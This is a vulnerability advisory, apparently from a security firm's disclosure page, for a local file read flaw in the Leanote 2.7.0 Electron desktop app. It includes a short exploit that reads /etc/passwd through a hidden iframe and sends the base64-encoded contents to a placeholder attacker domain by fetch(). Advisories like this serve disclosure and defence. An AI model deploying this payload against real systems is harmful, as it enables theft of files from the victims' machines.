Leanote 2.7.0 - Local File Read
Summary
| Name | Leanote 2.7.0 - Local File Read |
| Code name | |
| Product | Leanote |
| Affected versions | Version 2.7.0 |
| State | Public |
Vulnerability
| Kind | Lack of data validation - Path Traversal |
| Rule | |
| Remote | No |
| CVSSv3.1 Vector | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
| CVSSv3.1 Base Score | 5.5 |
| Exploit available | Yes |
| CVE ID(s) |
Description
Leanote version 2.7.0 allows obtaining arbitrary local files. This is possible because the application is vulnerable to LFR.
Vulnerability
A local file read (LFR) vulnerability has been identified in Leanote that allows an attacker to obtain arbitrary local files from the server. This was possible because not all security considerations that an electron-based application should have were followed.
Exploit
exploit.html
<iframe src="file:///etc/passwd" style="display: none;" onload="leak_internal_file(this.contentDocument.body.innerText)"></iframe> <script> function leak_internal_file(leak) { fetch("[MALICIOUS DOMAIN HERE]" + encodeURIComponent(btoa(leak))) } </script>
entrypoint.html
<iframe src="file:///Users/retr02332/Documents/exploit.html" style="display: none;">
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2024-0849 to refer to this issue from now on.
System Information
-
Version: Leanote 2.7.0
-
Operating System: MacOS
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/leanote/desktop-app
Timeline
2023-01-23
Vulnerability discovered.
2023-01-23
Vendor contacted.
2023-02-06
Public Disclosure.
